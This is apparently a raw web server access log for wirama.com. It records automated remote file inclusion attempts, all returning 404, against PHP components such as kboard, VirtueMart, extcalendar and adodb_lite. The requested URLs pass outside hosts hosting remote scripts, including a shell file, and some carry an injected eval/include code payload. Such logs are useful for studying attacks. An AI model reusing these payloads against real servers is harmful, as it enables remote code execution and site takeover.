174.120.139.148 - - [01/Jan/2010:07:36:56 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [01/Jan/2010:07:36:56 -0800] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.120.139.148 - - [01/Jan/2010:07:37:02 -0800] "GET /logs/access_090601.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rrrayman.com//modules/Forums/admin/rrray/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.36.253.32 - - [01/Jan/2010:07:37:44 -0800] "GET /logs/access_090401.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.xenguide.pe.kr/log/images/safe.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.wirama.com"
211.36.253.32 - - [01/Jan/2010:07:37:44 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.xenguide.pe.kr/log/images/safe.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.wirama.com"
211.36.253.32 - - [01/Jan/2010:07:37:45 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.xenguide.pe.kr/log/images/safe.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.wirama.com"
211.36.253.32 - - [01/Jan/2010:07:38:10 -0800] "GET /logs/access_090531.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.xenguide.pe.kr/log/images/safe.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.wirama.com"
121.149.207.114 - - [01/Jan/2010:07:40:36 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_virtuemart/errors.php?error=http://www.xenguide.pe.kr/log/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
121.149.207.114 - - [01/Jan/2010:07:40:37 -0800] "GET /administrator/components/com_virtuemart/errors.php?error=http://www.xenguide.pe.kr/log/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
121.149.207.114 - - [01/Jan/2010:07:40:37 -0800] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.xenguide.pe.kr/log/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.142.4.175 - - [01/Jan/2010:07:40:44 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.142.4.175 - - [01/Jan/2010:07:40:44 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.142.4.175 - - [01/Jan/2010:07:40:44 -0800] "GET /logs/access_090701.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.142.4.175 - - [01/Jan/2010:07:40:49 -0800] "GET /logs/access_091001.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:07:40:56 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:07:40:56 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:07:40:56 -0800] "GET /logs/access_090731.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:07:41:20 -0800] "GET /logs/access_090531.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.142.4.175 - - [01/Jan/2010:07:41:26 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.142.4.175 - - [01/Jan/2010:07:41:26 -0800] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.142.4.175 - - [01/Jan/2010:07:41:26 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.205.6.233 - - [01/Jan/2010:07:41:56 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.205.6.233 - - [01/Jan/2010:07:41:56 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.205.6.233 - - [01/Jan/2010:07:41:56 -0800] "GET /logs/access_090701.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.205.6.233 - - [01/Jan/2010:07:42:44 -0800] "GET /logs/access_090701.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.205.6.233 - - [01/Jan/2010:07:42:44 -0800] "GET /logs/access_091001.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.142.4.175 - - [01/Jan/2010:07:43:18 -0800] "GET /logs/access_090601.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.20.5.51 - - [01/Jan/2010:07:44:06 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.20.5.51 - - [01/Jan/2010:07:44:06 -0800] "GET /logs/access_090701.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.20.5.51 - - [01/Jan/2010:07:44:06 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.20.5.51 - - [01/Jan/2010:07:44:11 -0800] "GET /logs/access_091001.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:07:44:15 -0800] "GET /logs/access_090731.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:07:44:15 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:07:44:15 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
89.38.128.140 - - [01/Jan/2010:07:44:31 -0800] "GET /logs/access_090531.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.deprimeur.be/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.127.66.135 - - [01/Jan/2010:07:44:39 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.127.66.135 - - [01/Jan/2010:07:44:39 -0800] "GET /logs/access_090701.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.127.66.135 - - [01/Jan/2010:07:44:39 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
69.20.5.51 - - [01/Jan/2010:07:44:43 -0800] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.20.5.51 - - [01/Jan/2010:07:44:43 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.20.5.51 - - [01/Jan/2010:07:44:43 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.205.6.233 - - [01/Jan/2010:07:44:44 -0800] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.205.6.233 - - [01/Jan/2010:07:44:44 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.205.6.233 - - [01/Jan/2010:07:44:44 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:07:44:48 -0800] "GET /logs/access_091001.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.205.6.233 - - [01/Jan/2010:07:44:52 -0800] "GET /logs/access_090601.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.20.5.51 - - [01/Jan/2010:07:45:10 -0800] "GET /logs/access_090601.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:07:45:39 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:07:45:39 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.127.66.135 - - [01/Jan/2010:07:45:39 -0800] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
121.149.207.114 - - [01/Jan/2010:07:46:00 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/errors.php?error=http://www.xenguide.pe.kr/log/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.127.66.135 - - [01/Jan/2010:07:46:04 -0800] "GET /logs/access_090601.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:46:08 -0800] "GET /logs/access_090731.log//include/bbs.lib.inc.php?site_path=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:46:08 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:46:08 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:46:13 -0800] "GET /logs/access_090701.log//include/bbs.lib.inc.php?site_path=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
208.116.36.93 - - [01/Jan/2010:07:46:31 -0800] "GET /logs/access_091201.log//include/prodler.class.php?sPath=http://208.116.36.94/~giris/dxshell.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
208.116.36.93 - - [01/Jan/2010:07:46:31 -0800] "GET /include/prodler.class.php?sPath=http://208.116.36.94/~giris/dxshell.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
208.116.36.93 - - [01/Jan/2010:07:46:31 -0800] "GET /logs//include/prodler.class.php?sPath=http://208.116.36.94/~giris/dxshell.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
209.150.128.81 - - [01/Jan/2010:07:46:36 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:46:36 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:46:36 -0800] "GET /logs/access_090731.log//include/bbs.lib.inc.php?site_path=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:46:39 -0800] "GET /logs/access_090701.log//include/bbs.lib.inc.php?site_path=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:56:16 -0800] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:56:16 -0800] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:56:16 -0800] "GET /logs/access_090601.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:56:34 -0800] "GET /logs/access_090601.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:56:34 -0800] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:56:34 -0800] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:56:45 -0800] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:56:45 -0800] "GET /logs/access_090601.log//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:56:45 -0800] "GET /adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:56:54 -0800] "GET /logs/access_091101.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:57:02 -0800] "GET /logs/access_091101.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:07:57:04 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:07:57:04 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:07:57:04 -0800] "GET /logs/access_090329.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:07:57:05 -0800] "GET /logs/access_090329.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:07:57:05 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:07:57:05 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.150.128.81 - - [01/Jan/2010:07:57:20 -0800] "GET /logs/access_091031.log//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:57:36 -0800] "GET /logs/access_090601.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:57:36 -0800] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:57:36 -0800] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:58:15 -0800] "GET /adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:58:15 -0800] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.150.128.81 - - [01/Jan/2010:07:58:15 -0800] "GET /logs/access_090601.log//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.wwbible.org/modules/edito/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:58:45 -0800] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:58:56 -0800] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:58:56 -0800] "GET /logs/access_091101.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:07:59:12 -0800] "GET /logs/access_091101.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://qqe.ru/forum//attachments/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:07:59:18 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:07:59:22 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.17.250 - - [01/Jan/2010:08:00:38 -0800] "GET /include/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.17.250 - - [01/Jan/2010:08:00:38 -0800] "GET /logs//include/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.17.250 - - [01/Jan/2010:08:00:38 -0800] "GET /logs/access_091101.log//include/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.17.250 - - [01/Jan/2010:08:01:27 -0800] "GET /logs/access_090701.log//include/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:08:02:36 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:08:02:36 -0800] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:08:02:36 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:08:02:42 -0800] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:08:02:42 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:08:02:42 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:08:02:47 -0800] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:08:02:56 -0800] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:08:03:42 -0800] "GET /logs/access_090329.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:03:50 -0800] "GET /logs/access_090329.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:04:25 -0800] "GET /logs/access_090330.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:08:04:32 -0800] "GET /logs/access_090330.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
207.46.199.196 - - [01/Jan/2010:08:05:13 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
89.185.231.103 - - [01/Jan/2010:08:05:20 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
